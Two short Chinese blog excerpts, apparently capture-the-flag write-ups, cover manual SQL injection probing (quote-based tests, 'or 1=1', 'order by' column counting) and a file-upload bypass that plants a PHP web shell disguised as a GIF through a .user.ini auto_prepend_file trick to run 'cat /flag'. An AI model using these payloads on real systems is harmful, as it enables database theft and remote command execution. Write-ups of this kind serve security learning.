摘要:
一 首先判断注入点的存在以及类型。 1 正常 1' 报错,并根据报错信息以及1'#回显正常判断出符号包裹为单引号 1' and 1=1# 返回信息 1' and 1=2#无返回信息 因此存在单引号注入点 输入1' or 1=1 #可得到这个表的所有内容 二 获取列数 1' order by 1# 1 阅读全文
摘要:
一 前置知识 .user.ini文件 参考 二 解题 上传.user.ini文件,将我们上传的图片马当做php解析执行 GIF89a auto_prepend_file=shell.jpg 上传图片马 GIF89a <script language='php'>system('cat /flag') 阅读全文